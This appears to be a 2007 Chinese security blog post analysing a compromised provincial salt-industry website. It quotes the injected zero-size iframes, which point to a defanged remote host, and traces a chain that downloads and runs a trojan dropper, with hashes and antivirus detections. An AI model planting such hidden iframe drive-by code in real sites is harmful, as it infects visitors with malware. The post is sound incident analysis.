某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码

某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码

endurer 原创
2007-10-29 第1

该网站首页的首部和尾部被加入代码:
/---
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm width=0 height=0></iframe>
---/

hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm 的检查cookies变量HeiYeNo2,若不存在则创建,并输出代码:
/---
<iframe width=0 height=0 src=tcsafe.htm></iframe>
<iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/tcsafe.htm width=0 height=0></iframe>
---/

tcsafe.htm 下载 xxz.exe,保存为 tcsafe.com 并运行。


文件说明符 : d:/test/xxz.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor                                          
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract               
源文件名 : WEXTRACT.EXE           
创建时间 : 2007-10-26 12:17:32
修改时间 : 2007-10-26 12:17:36
访问时间 : 2007-10-26 12:22:53
大小 : 386560 字节 377.512 KB
MD5 : 452ec2b7ec2f9823a37874e90c55319d
SHA1: 87ABA7445FED3CD5CE2A4DF7CC705902A50B3A8A
CRC32: 07ca93ce


瑞星报为:Trojan.DL.Win32.Agent.zrc>>aspr.ske.2.x.new>>3.exe>>pe_patch(14)>>pe_patch(14)

 

主 题: RE: xxz.exe [KLAB-3175811]
  发件人: ""    发送时间:2007-10-26 13:31:08
Hello.
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

你可能感兴趣的:(系统安全)